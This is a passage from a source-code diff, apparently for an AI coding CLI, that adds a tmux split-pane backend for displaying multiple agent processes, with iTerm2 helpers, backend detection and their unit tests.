}); + + it('getAgentScrollbackLength returns 0', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + expect(backend.getAgentScrollbackLength('a')).toBe(0); + }); + + // ─── getAttachHint ──────────────────────────────────────── + + it('returns attach command when outside tmux', async () => { + await backend.init(); + const hint = backend.getAttachHint(); + expect(hint).toMatch(/^tmux -L arena-server-\d+ a$/); + }); + + it('returns null when inside tmux', async () => { + process.env['TMUX'] = '/tmp/tmux-1000/default,12345,0'; + backend = new TmuxBackend(); + await backend.init(); + expect(backend.getAttachHint()).toBeNull(); + }); + + // ─── Spawn failure handling ─────────────────────────────── + + it('registers failed agent and fires exit callback on spawn error', async () => { + await backend.init(); + + // Make the external session setup fail + hoistedTmuxHasSession.mockRejectedValueOnce(new Error('tmux exploded')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + await spawnWithTimers(backend, makeConfig('fail')); + + expect(exitCallback).toHaveBeenCalledWith('fail', 1, null); + }); +}); diff --git a/packages/core/src/agents/backends/TmuxBackend.ts b/packages/core/src/agents/backends/TmuxBackend.ts new file mode 100644 index 000000000..adc75593f --- /dev/null +++ b/packages/core/src/agents/backends/TmuxBackend.ts @@ -0,0 +1,813 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview TmuxBackend implements Backend using tmux split-pane. + * + * Layout (inside tmux): main process on the left (leader pane ~30%), + * agent panes on the right, arranged via `main-vertical`. 
+ * + * ┌────────────┬──────────────────────────────────┐ + * │ │ Agent 1 │ + * │ Leader ├──────────────────────────────────┤ + * │ (30%) │ Agent 2 │ + * │ ├──────────────────────────────────┤ + * │ │ Agent 3 │ + * └────────────┴──────────────────────────────────┘ + * + * Outside tmux: a dedicated tmux server is created and panes are arranged + * using `tiled` layout in a separate session/window. + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AgentSpawnConfig, AgentExitCallback, Backend } from './types.js'; +import { + verifyTmux, + tmuxCurrentWindowTarget, + tmuxCurrentPaneId, + tmuxHasSession, + tmuxHasWindow, + tmuxNewSession, + tmuxNewWindow, + tmuxSplitWindow, + tmuxSendKeys, + tmuxSelectPane, + tmuxSelectPaneTitle, + tmuxSelectPaneStyle, + tmuxSelectLayout, + tmuxListPanes, + tmuxSetOption, + tmuxRespawnPane, + tmuxKillPane, + tmuxKillSession, + tmuxResizePane, + tmuxGetFirstPaneId, + type TmuxPaneInfo, +} from './tmux-commands.js'; + +const debugLogger = createDebugLogger('TMUX_BACKEND'); + +/** Polling interval for exit detection (ms) */ +const EXIT_POLL_INTERVAL_MS = 500; + +/** Default tmux server name prefix (for -L) when running outside tmux. + * Actual name is `${prefix}-${process.pid}` so each leader process is isolated. 
*/ +const TMUX_SERVER_PREFIX = 'arena-server'; +/** Default tmux session name when running outside tmux */ +const DEFAULT_TMUX_SESSION = 'arena-view'; +/** Default tmux window name when running outside tmux */ +const DEFAULT_TMUX_WINDOW = 'arena-view'; +/** Default leader pane width percent (main pane) */ +const DEFAULT_LEADER_WIDTH_PERCENT = 30; +/** Default first split percent (right side) */ +const DEFAULT_FIRST_SPLIT_PERCENT = 70; +/** Default pane border format */ +const DEFAULT_PANE_BORDER_FORMAT = '#{pane_title}'; +/** Layout settle delays */ +const INTERNAL_LAYOUT_SETTLE_MS = 200; +const EXTERNAL_LAYOUT_SETTLE_MS = 120; + +interface TmuxAgentPane { + agentId: string; + paneId: string; + status: 'running' | 'exited'; + exitCode: number; +} + +interface ResolvedTmuxOptions { + serverName: string; + sessionName: string; + windowName: string; + paneTitle: string; + paneBorderStyle?: string; + paneActiveBorderStyle?: string; + paneBorderFormat: string; + paneBorderStatus?: 'top' | 'bottom' | 'off'; + leaderPaneWidthPercent: number; + firstSplitPercent: number; +} + +export class TmuxBackend implements Backend { + readonly type = DISPLAY_MODE.TMUX; + + /** The pane ID where the main process runs (left side) */ + private mainPaneId = ''; + /** Window target (session:window) */ + private windowTarget = ''; + /** Whether we are running inside tmux */ + private insideTmux = false; + /** External tmux server name (when outside tmux) */ + private serverName: string | null = null; + /** External tmux session name (when outside tmux) */ + private sessionName: string | null = null; + /** External tmux window name (when outside tmux) */ + private windowName: string | null = null; + + private panes: Map = new Map(); + private agentOrder: string[] = []; + private activeAgentId: string | null = null; + private onExitCallback: AgentExitCallback | null = null; + private exitPollTimer: NodeJS.Timeout | null = null; + private initialized = false; + /** Whether cleanup() has been 
called */ + private cleanedUp = false; + /** Number of agents currently being spawned asynchronously */ + private pendingSpawns = 0; + /** Queue to serialize spawn operations (prevents race conditions) */ + private spawnQueue: Promise = Promise.resolve(); + async init(): Promise { + if (this.initialized) return; + + // Verify tmux is available and version is sufficient + await verifyTmux(); + + this.insideTmux = Boolean(process.env['TMUX']); + + if (this.insideTmux) { + // Get the current pane ID (this is where the main process runs) + this.mainPaneId = await tmuxCurrentPaneId(); + this.windowTarget = await tmuxCurrentWindowTarget(); + debugLogger.info( + `Initialized inside tmux: pane ${this.mainPaneId}, window ${this.windowTarget}`, + ); + } else { + debugLogger.info( + 'Initialized outside tmux; will use external tmux server', + ); + } + + this.initialized = true; + } + + // ─── Agent Lifecycle ──────────────────────────────────────── + + async spawnAgent(config: AgentSpawnConfig): Promise { + if (!this.initialized) { + throw new Error('TmuxBackend not initialized. Call init() first.'); + } + if (this.panes.has(config.agentId)) { + throw new Error(`Agent "${config.agentId}" already exists.`); + } + + // Build the shell command string for the agent + const cmd = this.buildShellCommand(config); + + // Track pending spawn so waitForAll/allExited don't return + // prematurely before the pane is registered. + this.pendingSpawns++; + + // Chain spawn operations to ensure they run sequentially. + // This prevents race conditions where multiple agents all see + // panes.size === 0 and try to split from mainPaneId. 
+ const spawnPromise = this.spawnQueue.then(() => + this.spawnAgentAsync(config, cmd), + ); + this.spawnQueue = spawnPromise; + + // Wait for this specific spawn to complete + await spawnPromise; + } + + private async spawnAgentAsync( + config: AgentSpawnConfig, + cmd: string, + ): Promise { + const { agentId } = config; + const options = this.resolveTmuxOptions(config); + + debugLogger.info( + `[spawnAgentAsync] Starting spawn for agent "${agentId}", mainPane="${this.mainPaneId}", currentPanesCount=${this.panes.size}`, + ); + try { + let paneId = ''; + if (this.insideTmux) { + paneId = await this.spawnInsideTmux(cmd, options); + } else { + paneId = await this.spawnOutsideTmux(config, cmd, options); + } + + const serverName = this.getServerName(); + + // Set remain-on-exit so we can detect when the process exits + await tmuxSetOption(paneId, 'remain-on-exit', 'on', serverName); + + // Apply pane title/border styling + await this.applyPaneDecorations(paneId, options, serverName); + + if (this.insideTmux) { + await this.applyInsideLayout(options); + await this.sleep(INTERNAL_LAYOUT_SETTLE_MS); + // Keep focus on the main pane + await tmuxSelectPane(this.mainPaneId); + this.triggerMainProcessRedraw(); + } else { + await this.applyExternalLayout(serverName); + await this.sleep(EXTERNAL_LAYOUT_SETTLE_MS); + } + + const agentPane: TmuxAgentPane = { + agentId, + paneId, + status: 'running', + exitCode: 0, + }; + + this.panes.set(agentId, agentPane); + this.agentOrder.push(agentId); + + // First agent becomes active + if (this.activeAgentId === null) { + this.activeAgentId = agentId; + } + + // Start exit polling if not already running + this.startExitPolling(); + + debugLogger.info( + `[spawnAgentAsync] Spawned agent "${agentId}" in pane ${paneId} — SUCCESS`, + ); + } catch (error) { + debugLogger.error( + `[spawnAgentAsync] Failed to spawn agent "${agentId}":`, + error, + ); + // Still register the agent as failed so exit callback fires + this.panes.set(agentId, { + 
agentId, + paneId: '', + status: 'exited', + exitCode: 1, + }); + this.agentOrder.push(agentId); + this.onExitCallback?.(agentId, 1, null); + } finally { + this.pendingSpawns--; + } + } + + /** + * Trigger terminal redraw in main process after pane layout changes. + * Uses multiple methods to ensure Ink picks up the new terminal size. + */ + private triggerMainProcessRedraw(): void { + if (!this.insideTmux) return; + // Small delay to let tmux finish the resize operation + setTimeout(() => { + try { + // Method 1: Emit resize event on stdout (Ink listens to this) + if (process.stdout.isTTY) { + process.stdout.emit('resize'); + debugLogger.info( + '[triggerMainProcessRedraw] Emitted stdout resize event', + ); + } + + // Method 2: Send SIGWINCH signal + process.kill(process.pid, 'SIGWINCH'); + debugLogger.info('[triggerMainProcessRedraw] Sent SIGWINCH'); + } catch (error) { + debugLogger.info(`[triggerMainProcessRedraw] Failed: ${error}`); + } + }, 100); + } + + stopAgent(agentId: string): void { + const pane = this.panes.get(agentId); + if (!pane || pane.status !== 'running') return; + // Kill the pane outright — a single Ctrl-C only cancels the current + // turn in interactive CLI agents and does not reliably exit the process. 
+ if (pane.paneId) { + void tmuxKillPane(pane.paneId, this.getServerName()); + } + pane.status = 'exited'; + debugLogger.info(`Killed pane for agent "${agentId}"`); + } + + stopAll(): void { + for (const [agentId, pane] of this.panes.entries()) { + if (pane.status === 'running') { + if (pane.paneId) { + void tmuxKillPane(pane.paneId, this.getServerName()); + } + pane.status = 'exited'; + debugLogger.info(`Killed pane for agent "${agentId}"`); + } + } + } + + async cleanup(): Promise { + this.cleanedUp = true; + this.stopExitPolling(); + + // Kill all agent panes (but not the main pane) + for (const pane of this.panes.values()) { + if (pane.paneId) { + try { + await tmuxKillPane(pane.paneId, this.getServerName()); + debugLogger.info(`Killed agent pane ${pane.paneId}`); + } catch (_error) { + // Pane may already be gone + debugLogger.info( + `Failed to kill pane ${pane.paneId} (may already be gone)`, + ); + } + } + } + + // Kill the external tmux session/server if we created one + if (!this.insideTmux && this.sessionName && this.serverName) { + try { + await tmuxKillSession(this.sessionName, this.serverName); + debugLogger.info( + `Killed external tmux session "${this.sessionName}" on server "${this.serverName}"`, + ); + } catch (_error) { + debugLogger.info( + `Failed to kill external tmux session (may already be gone)`, + ); + } + } + + this.panes.clear(); + this.agentOrder = []; + this.activeAgentId = null; + this.serverName = null; + this.sessionName = null; + this.windowName = null; + this.windowTarget = ''; + this.mainPaneId = ''; + } + + setOnAgentExit(callback: AgentExitCallback): void { + this.onExitCallback = callback; + } + + async waitForAll(timeoutMs?: number): Promise { + if (this.allExited() || this.cleanedUp) return this.allExited(); + + return new Promise((resolve) => { + let timeoutHandle: NodeJS.Timeout | undefined; + + const checkInterval = setInterval(() => { + if (this.allExited() || this.cleanedUp) { + clearInterval(checkInterval); + if 
(timeoutHandle) clearTimeout(timeoutHandle); + resolve(this.allExited()); + } + }, EXIT_POLL_INTERVAL_MS); + + if (timeoutMs !== undefined) { + timeoutHandle = setTimeout(() => { + clearInterval(checkInterval); + resolve(false); + }, timeoutMs); + } + }); + } + + // ─── Active Agent & Navigation ────────────────────────────── + + switchTo(agentId: string): void { + if (!this.panes.has(agentId)) { + throw new Error(`Agent "${agentId}" not found.`); + } + const pane = this.panes.get(agentId)!; + this.activeAgentId = agentId; + void tmuxSelectPane(pane.paneId, this.getServerName()); + } + + switchToNext(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const nextIndex = (currentIndex + 1) % this.agentOrder.length; + this.switchTo(this.agentOrder[nextIndex]!); + } + + switchToPrevious(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const prevIndex = + (currentIndex - 1 + this.agentOrder.length) % this.agentOrder.length; + this.switchTo(this.agentOrder[prevIndex]!); + } + + getActiveAgentId(): string | null { + return this.activeAgentId; + } + + // ─── Screen Capture ───────────────────────────────────────── + + getActiveSnapshot(): AnsiOutput | null { + if (!this.activeAgentId) return null; + return this.getAgentSnapshot(this.activeAgentId); + } + + getAgentSnapshot( + agentId: string, + _scrollOffset: number = 0, + ): AnsiOutput | null { + // tmux panes are rendered by tmux itself. capture-pane is available + // but returns raw text. For the progress bar we don't need snapshots; + // full rendering is handled by tmux directly. + // Return null — the UI doesn't use snapshots for split-pane backends. 
+ return null; + } + + getAgentScrollbackLength(_agentId: string): number { + // Scrollback is managed by tmux, not by us + return 0; + } + + // ─── Input ────────────────────────────────────────────────── + + forwardInput(data: string): boolean { + if (!this.activeAgentId) return false; + return this.writeToAgent(this.activeAgentId, data); + } + + writeToAgent(agentId: string, data: string): boolean { + const pane = this.panes.get(agentId); + if (!pane || pane.status !== 'running') return false; + void tmuxSendKeys( + pane.paneId, + data, + { literal: true }, + this.getServerName(), + ); + return true; + } + + // ─── Resize ───────────────────────────────────────────────── + + resizeAll(_cols: number, _rows: number): void { + // tmux manages pane sizes automatically based on the terminal window + } + + // ─── External Session Info ───────────────────────────────── + + getAttachHint(): string | null { + if (this.insideTmux) { + return null; + } + // When outside tmux, the server name is determined at init time + // (per-process unique). Return the attach command even before + // ensureExternalSession runs, since the server name is deterministic. + const server = this.serverName ?? `${TMUX_SERVER_PREFIX}-${process.pid}`; + return `tmux -L ${server} a`; + } + + // ─── Private ──────────────────────────────────────────────── + + private resolveTmuxOptions(config: AgentSpawnConfig): ResolvedTmuxOptions { + const opts = config.backend?.tmux ?? {}; + return { + serverName: opts.serverName ?? `${TMUX_SERVER_PREFIX}-${process.pid}`, + sessionName: opts.sessionName ?? DEFAULT_TMUX_SESSION, + windowName: opts.windowName ?? DEFAULT_TMUX_WINDOW, + paneTitle: opts.paneTitle ?? config.agentId, + paneBorderStyle: opts.paneBorderStyle, + paneActiveBorderStyle: opts.paneActiveBorderStyle, + paneBorderFormat: opts.paneBorderFormat ?? DEFAULT_PANE_BORDER_FORMAT, + paneBorderStatus: + opts.paneBorderStatus ?? (this.insideTmux ? 
undefined : 'top'), + leaderPaneWidthPercent: + opts.leaderPaneWidthPercent ?? DEFAULT_LEADER_WIDTH_PERCENT, + firstSplitPercent: opts.firstSplitPercent ?? DEFAULT_FIRST_SPLIT_PERCENT, + }; + } + + private getServerName(): string | undefined { + return this.insideTmux ? undefined : (this.serverName ?? undefined); + } + + private async ensureExternalSession( + config: AgentSpawnConfig, + options: ResolvedTmuxOptions, + ): Promise { + if ( + this.windowTarget && + this.serverName && + this.sessionName && + this.windowName + ) { + return; + } + + this.serverName = options.serverName; + this.sessionName = options.sessionName; + this.windowName = options.windowName; + + const serverName = this.serverName; + const sessionExists = await tmuxHasSession(this.sessionName, serverName); + + if (!sessionExists) { + await tmuxNewSession( + this.sessionName, + { + cols: config.cols, + rows: config.rows, + windowName: this.windowName, + }, + serverName, + ); + } + + const windowExists = sessionExists + ? 
await tmuxHasWindow(this.sessionName, this.windowName, serverName) + : true; + + if (!windowExists) { + await tmuxNewWindow(this.sessionName, this.windowName, serverName); + } + + this.windowTarget = `${this.sessionName}:${this.windowName}`; + + if (!this.mainPaneId) { + this.mainPaneId = await tmuxGetFirstPaneId(this.windowTarget, serverName); + } + } + + private async spawnInsideTmux( + cmd: string, + options: ResolvedTmuxOptions, + ): Promise { + if (!this.windowTarget) { + throw new Error('Tmux window target not initialized.'); + } + + const panes = await tmuxListPanes(this.windowTarget); + const paneCount = panes.length; + if (paneCount === 1) { + debugLogger.info( + `[spawnInsideTmux] First agent — split -h -l ${options.firstSplitPercent}% from ${this.mainPaneId}`, + ); + return await tmuxSplitWindow(this.mainPaneId, { + horizontal: true, + percent: options.firstSplitPercent, + command: cmd, + }); + } + + const splitTarget = this.pickMiddlePane(panes).paneId; + const horizontal = this.shouldSplitHorizontally(paneCount); + debugLogger.info( + `[spawnInsideTmux] Split from middle pane ${splitTarget} (${paneCount} panes, ${horizontal ? 
'horizontal' : 'vertical'})`, + ); + return await tmuxSplitWindow(splitTarget, { + horizontal, + command: cmd, + }); + } + + private async spawnOutsideTmux( + config: AgentSpawnConfig, + cmd: string, + options: ResolvedTmuxOptions, + ): Promise { + await this.ensureExternalSession(config, options); + if (!this.windowTarget) { + throw new Error('External tmux window target not initialized.'); + } + + const serverName = this.getServerName(); + + if (this.panes.size === 0) { + const firstPaneId = await tmuxGetFirstPaneId( + this.windowTarget, + serverName, + ); + this.mainPaneId = firstPaneId; + debugLogger.info( + `[spawnOutsideTmux] First agent — respawn in pane ${firstPaneId}`, + ); + await tmuxRespawnPane(firstPaneId, cmd, serverName); + return firstPaneId; + } + + const panes = await tmuxListPanes(this.windowTarget, serverName); + const splitTarget = this.pickMiddlePane(panes).paneId; + const horizontal = this.shouldSplitHorizontally(panes.length); + debugLogger.info( + `[spawnOutsideTmux] Split from middle pane ${splitTarget} (${panes.length} panes, ${horizontal ? 
'horizontal' : 'vertical'})`, + ); + return await tmuxSplitWindow( + splitTarget, + { horizontal, command: cmd }, + serverName, + ); + } + + private pickMiddlePane(panes: TmuxPaneInfo[]): TmuxPaneInfo { + if (panes.length === 0) { + throw new Error('No panes available to split.'); + } + return panes[Math.floor(panes.length / 2)]!; + } + + private shouldSplitHorizontally(paneCount: number): boolean { + return paneCount % 2 === 1; + } + + private async applyPaneDecorations( + paneId: string, + options: ResolvedTmuxOptions, + serverName?: string, + ): Promise { + if (!this.windowTarget) return; + + if (options.paneBorderStatus) { + await tmuxSetOption( + this.windowTarget, + 'pane-border-status', + options.paneBorderStatus, + serverName, + ); + } + + if (options.paneBorderFormat) { + await tmuxSetOption( + this.windowTarget, + 'pane-border-format', + options.paneBorderFormat, + serverName, + ); + } + + if (options.paneBorderStyle) { + await tmuxSetOption( + this.windowTarget, + 'pane-border-style', + options.paneBorderStyle, + serverName, + ); + await tmuxSelectPaneStyle(paneId, options.paneBorderStyle, serverName); + } + + if (options.paneActiveBorderStyle) { + await tmuxSetOption( + this.windowTarget, + 'pane-active-border-style', + options.paneActiveBorderStyle, + serverName, + ); + } + + await tmuxSelectPaneTitle(paneId, options.paneTitle, serverName); + } + + private async applyInsideLayout(options: ResolvedTmuxOptions): Promise { + if (!this.windowTarget || !this.mainPaneId) return; + await tmuxSelectLayout(this.windowTarget, 'main-vertical'); + await tmuxResizePane(this.mainPaneId, { + width: `${options.leaderPaneWidthPercent}%`, + }); + } + + private async applyExternalLayout(serverName?: string): Promise { + if (!this.windowTarget) return; + await tmuxSelectLayout(this.windowTarget, 'tiled', serverName); + } + + private async sleep(ms: number): Promise { + await new Promise((resolve) => setTimeout(resolve, ms)); + } + + private buildShellCommand(config: 
/**
 * One polling tick: list the panes of the active window and mark every
 * still-running agent whose pane is dead or missing as exited.
 *
 * For each such agent the status and exit code are updated first, then the
 * event is logged, then `onExitCallback` is invoked. A pane that no longer
 * appears in the listing is reported with exit code 1. Polling is stopped
 * once `allExited()` reports true. If listing the panes fails, the tick is
 * abandoned without changing any agent state.
 */
private async pollPaneStatus(): Promise<void> {
  const serverName = this.getServerName();

  let listed: TmuxPaneInfo[];
  try {
    if (!this.windowTarget) return;
    listed = await tmuxListPanes(this.windowTarget, serverName);
  } catch (err) {
    // Window may have been killed externally
    debugLogger.info(
      `[pollPaneStatus] Failed to list panes for window "${this.windowTarget}": ${err}`,
    );
    return;
  }

  // paneId → TmuxPaneInfo lookup for this tick.
  const byPaneId = new Map<string, TmuxPaneInfo>(
    listed.map((pane): [string, TmuxPaneInfo] => [pane.paneId, pane]),
  );

  // Debug snapshot of every tracked agent (skipped when none are tracked).
  if (this.panes.size > 0) {
    const snapshot = Array.from(this.panes.values()).map((tracked) => {
      const live = byPaneId.get(tracked.paneId);
      return {
        agentId: tracked.agentId,
        paneId: tracked.paneId,
        status: tracked.status,
        dead: live?.dead,
        deadStatus: live?.deadStatus,
      };
    });
    debugLogger.info(
      `[pollPaneStatus] paneCount=${listed.length}, agentPanes=${JSON.stringify(snapshot)}`,
    );
  }

  for (const agent of this.panes.values()) {
    if (agent.status !== 'running') continue;

    const info = byPaneId.get(agent.paneId);
    if (info && !info.dead) continue; // still alive

    // Missing pane → killed externally, reported as exit code 1.
    const exitCode = info ? info.deadStatus : 1;
    agent.status = 'exited';
    agent.exitCode = exitCode;

    debugLogger.info(
      info
        ? `[pollPaneStatus] Agent "${agent.agentId}" (pane ${agent.paneId}) detected as DEAD with exit code ${info.deadStatus}`
        : `[pollPaneStatus] Agent "${agent.agentId}" pane ${agent.paneId} not found in tmux list — marking as exited`,
    );

    this.onExitCallback?.(agent.agentId, exitCode, null);
  }

  // Nothing left to watch once every agent has exited.
  if (this.allExited()) {
    this.stopExitPolling();
  }
}
/**
 * Create the Backend used to run agents.
 *
 * Only in-process mode is wired up at the moment: this function always
 * returns an `InProcessBackend`, regardless of `preference` or of the
 * terminal it runs in. When a different display mode is requested, the
 * result additionally carries a `warning` explaining the fallback.
 *
 * The tmux / iTerm2 selection logic (explicit preference first, then
 * auto-detection via `$TMUX` and tmux availability) is kept below as
 * commented-out reference code and is NOT executed.
 *
 * @param preference - Optional display mode requested by the user.
 * @param runtimeContext - Runtime config handed to `InProcessBackend`.
 * @returns The backend, plus a warning when `preference` was not honoured.
 */
export async function detectBackend(
  preference: DisplayMode | undefined,
  runtimeContext: Config,
): Promise<DetectBackendResult> {
  // Currently only in-process mode is supported. Other backends (tmux,
  // iterm2) are kept in the codebase but not wired up as entry points.
  const warning =
    preference && preference !== DISPLAY_MODE.IN_PROCESS
      ? `Display mode "${preference}" is not currently supported. Using in-process mode instead.`
      : undefined;
  debugLogger.info('Using InProcessBackend');
  return { backend: new InProcessBackend(runtimeContext), warning };

  // --- Disabled backends (kept for future use) ---
  // // 1. User explicit preference
  // if (preference === DISPLAY_MODE.IN_PROCESS) {
  //   debugLogger.info('Using InProcessBackend (user preference)');
  //   return { backend: new InProcessBackend(runtimeContext) };
  // }
  //
  // if (preference === DISPLAY_MODE.ITERM2) {
  //   throw new Error(
  //     `Arena display mode "${DISPLAY_MODE.ITERM2}" is not implemented yet. Please use "${DISPLAY_MODE.TMUX}" or "${DISPLAY_MODE.IN_PROCESS}".`,
  //   );
  // }
  //
  // if (preference === DISPLAY_MODE.TMUX) {
  //   debugLogger.info('Using TmuxBackend (user preference)');
  //   return { backend: new TmuxBackend() };
  // }
  //
  // // 2. Auto-detect
  // if (process.env['TMUX']) {
  //   debugLogger.info('Detected $TMUX — attempting TmuxBackend');
  //   return { backend: new TmuxBackend() };
  // }
  //
  // // Other terminals (including iTerm2): use tmux external session mode if available.
  // if (isTmuxAvailable()) {
  //   debugLogger.info(
  //     'tmux is available — using TmuxBackend external session mode',
  //   );
  //   return { backend: new TmuxBackend() };
  // }
  //
  // // Fallback: use InProcessBackend
  // debugLogger.info(
  //   'No PTY backend available — falling back to InProcessBackend',
  // );
  // return {
  //   backend: new InProcessBackend(runtimeContext),
  //   warning:
  //     'tmux is not available. Using in-process mode (no split-pane terminal view).',
  // };
}
// ─── ensureIt2Installed ──────────────────────────────────────

describe('ensureIt2Installed', () => {
  // Result of an installer run that exits cleanly.
  const installOk = { code: 0, stdout: '', stderr: '' };

  // Queue one isCommandAvailable() answer per flag, consumed in call order.
  const queueAvailability = (...flags: boolean[]): void => {
    for (const available of flags) {
      hoistedIsCommandAvailable.mockReturnValueOnce({ available });
    }
  };

  it('does nothing if it2 is already available', async () => {
    hoistedIsCommandAvailable.mockReturnValue({ available: true });

    await ensureIt2Installed();

    expect(hoistedExecCommand).not.toHaveBeenCalled();
  });

  it('installs via uv when uv is available', async () => {
    // it2 missing → uv present → it2 present on the post-install recheck
    queueAvailability(false, true, true);
    hoistedExecCommand.mockResolvedValue(installOk);

    await ensureIt2Installed();

    expect(hoistedExecCommand).toHaveBeenCalledWith(
      'uv',
      ['tool', 'install', 'it2'],
      expect.any(Object),
    );
  });

  it('falls back to pipx when uv is unavailable', async () => {
    // it2 missing → uv missing → pipx present → recheck succeeds
    queueAvailability(false, false, true, true);
    hoistedExecCommand.mockResolvedValue(installOk);

    await ensureIt2Installed();

    expect(hoistedExecCommand).toHaveBeenCalledWith(
      'pipx',
      ['install', 'it2'],
      expect.any(Object),
    );
  });

  it('falls back to pip when uv and pipx are unavailable', async () => {
    // it2 missing → uv missing → pipx missing → pip present → recheck succeeds
    queueAvailability(false, false, false, true, true);
    hoistedExecCommand.mockResolvedValue(installOk);

    await ensureIt2Installed();

    expect(hoistedExecCommand).toHaveBeenCalledWith(
      'pip',
      ['install', '--user', 'it2'],
      expect.any(Object),
    );
  });

  it('throws if no installer succeeds', async () => {
    hoistedIsCommandAvailable.mockReturnValue({ available: false });

    await expect(ensureIt2Installed()).rejects.toThrow('it2 is not installed');
  });
});
// ─── itermSplitPane ──────────────────────────────────────────

describe('itermSplitPane', () => {
  // Make the mocked execCommand resolve with the given it2 result.
  const stubIt2 = (code: number, stdout: string, stderr: string): void => {
    hoistedExecCommand.mockResolvedValue({ code, stdout, stderr });
  };

  it('splits vertically without session ID', async () => {
    stubIt2(0, 'Created new pane: w0t1p2\n', '');

    const paneId = await itermSplitPane();

    expect(paneId).toBe('w0t1p2');
    expect(hoistedExecCommand).toHaveBeenCalledWith(
      'it2',
      ['session', 'split', '-v'],
      expect.any(Object),
    );
  });

  it('passes -s flag when session ID is provided', async () => {
    stubIt2(0, 'Created new pane: w0t1p3\n', '');

    await itermSplitPane('sess-123');

    expect(hoistedExecCommand).toHaveBeenCalledWith(
      'it2',
      ['session', 'split', '-v', '-s', 'sess-123'],
      expect.any(Object),
    );
  });

  it('throws if pane ID cannot be parsed from output', async () => {
    stubIt2(0, 'Unexpected output\n', '');

    await expect(itermSplitPane()).rejects.toThrow('Unable to parse');
  });

  it('throws on non-zero exit code', async () => {
    stubIt2(1, '', 'split failed');

    await expect(itermSplitPane()).rejects.toThrow('split failed');
  });
});
// ─── itermCloseSession ────────────────────────────────────────

describe('itermCloseSession', () => {
  it('calls it2 session close with correct args', async () => {
    const success = { code: 0, stdout: '', stderr: '' };
    hoistedExecCommand.mockResolvedValue(success);

    await itermCloseSession('sess-1');

    const expectedArgs = ['session', 'close', '-s', 'sess-1'];
    expect(hoistedExecCommand).toHaveBeenCalledWith(
      'it2',
      expectedArgs,
      expect.any(Object),
    );
  });
});
/**
 * Extract the new pane/session ID from the output of `it2 session split`.
 *
 * The ID is the first run of non-whitespace characters following the text
 * "Created new pane:".
 *
 * @param output - Raw stdout of the split command.
 * @returns The parsed pane ID.
 * @throws Error when the expected "Created new pane:" marker is absent.
 */
function parseCreatedPaneId(output: string): string {
  const paneId = /Created new pane:\s*(\S+)/.exec(output)?.[1];
  if (paneId) {
    return paneId;
  }
  throw new Error(`Unable to parse it2 split output: ${output.trim()}`);
}
/**
 * Verify that iTerm2 can be driven through the it2 CLI.
 *
 * Makes sure it2 is installed (via `ensureIt2Installed`), then runs
 * `it2 session list`. A zero exit code means success. On failure, the
 * lower-cased stdout/stderr is searched for a few keywords; if any is found
 * the failure is reported as the Python API being disabled, otherwise the
 * raw command output is reported.
 *
 * @throws Error describing why iTerm2 cannot be used.
 */
export async function verifyITerm(): Promise<void> {
  await ensureIt2Installed();

  const { code, stdout, stderr } = await it2Result(['session', 'list']);
  if (code === 0) return;

  // Keywords treated as a sign that the Python API is switched off.
  const apiHints = ['api', 'python', 'connection refused', 'not enabled'];
  const haystack = `${stdout}\n${stderr}`.toLowerCase();
  const looksLikeApiDisabled = apiHints.some((hint) =>
    haystack.includes(hint),
  );

  if (looksLikeApiDisabled) {
    throw new Error(
      'iTerm2 Python API not enabled. Enable it in iTerm2 → Settings → General → Magic → Enable Python API, then restart iTerm2.',
    );
  }

  const detail = stderr.trim() || stdout.trim();
  throw new Error(`it2 session list failed: ${detail}`);
}
describe('parseTmuxListPanes', () => {
  type Panes = ReturnType<typeof parseTmuxListPanes>;

  // One row per scenario: test title, raw list-panes output, expected parse.
  const scenarios: Array<{ title: string; output: string; expected: Panes }> =
    [
      {
        title: 'parses a single running pane',
        output: '%0 0 0\n',
        expected: [{ paneId: '%0', dead: false, deadStatus: 0 }],
      },
      {
        title: 'parses a single dead pane with exit code',
        output: '%1 1 42\n',
        expected: [{ paneId: '%1', dead: true, deadStatus: 42 }],
      },
      {
        title: 'parses multiple panes with mixed statuses',
        output: '%0 0 0\n%1 1 1\n%2 0 0\n%3 1 137\n',
        expected: [
          { paneId: '%0', dead: false, deadStatus: 0 },
          { paneId: '%1', dead: true, deadStatus: 1 },
          { paneId: '%2', dead: false, deadStatus: 0 },
          { paneId: '%3', dead: true, deadStatus: 137 },
        ],
      },
      {
        title: 'returns empty array for empty output',
        output: '',
        expected: [],
      },
      {
        title: 'returns empty array for whitespace-only output',
        output: ' \n \n',
        expected: [],
      },
      {
        title: 'skips lines with insufficient fields',
        output: '%0\n%1 1 0\n',
        expected: [{ paneId: '%1', dead: true, deadStatus: 0 }],
      },
      {
        // tmux might omit the third field when pane is alive
        title: 'defaults deadStatus to 0 when missing',
        output: '%0 0\n',
        expected: [{ paneId: '%0', dead: false, deadStatus: 0 }],
      },
      {
        title: 'handles extra whitespace gracefully',
        output: ' %5 1 99 \n',
        expected: [{ paneId: '%5', dead: true, deadStatus: 99 }],
      },
    ];

  for (const { title, output, expected } of scenarios) {
    it(title, () => {
      expect(parseTmuxListPanes(output)).toEqual(expected);
    });
  }
});
/**
 * Pull the first `major.minor` pair out of a version string.
 *
 * Example: "tmux 3.4" → [3, 4]. Strings without such a pair yield [0, 0].
 */
function parseVersion(versionStr: string): number[] {
  const found = /(\d+)\.(\d+)/.exec(versionStr);
  if (found === null) {
    return [0, 0];
  }
  const [, major, minor] = found;
  return [parseInt(major!, 10), parseInt(minor!, 10)];
}

/**
 * Compare two version strings on their `major.minor` pair.
 *
 * @param current - Version string to check (e.g. "tmux 3.4").
 * @param minimum - Lowest acceptable version (e.g. "3.0").
 * @returns true when `current` is equal to or newer than `minimum`.
 */
function isVersionAtLeast(current: string, minimum: string): boolean {
  const [curMajor = 0, curMinor = 0] = parseVersion(current);
  const [minMajor = 0, minMinor = 0] = parseVersion(minimum);
  // Minor only matters when the majors tie.
  return curMajor === minMajor ? curMinor >= minMinor : curMajor > minMajor;
}
/**
 * List windows in a session.
 *
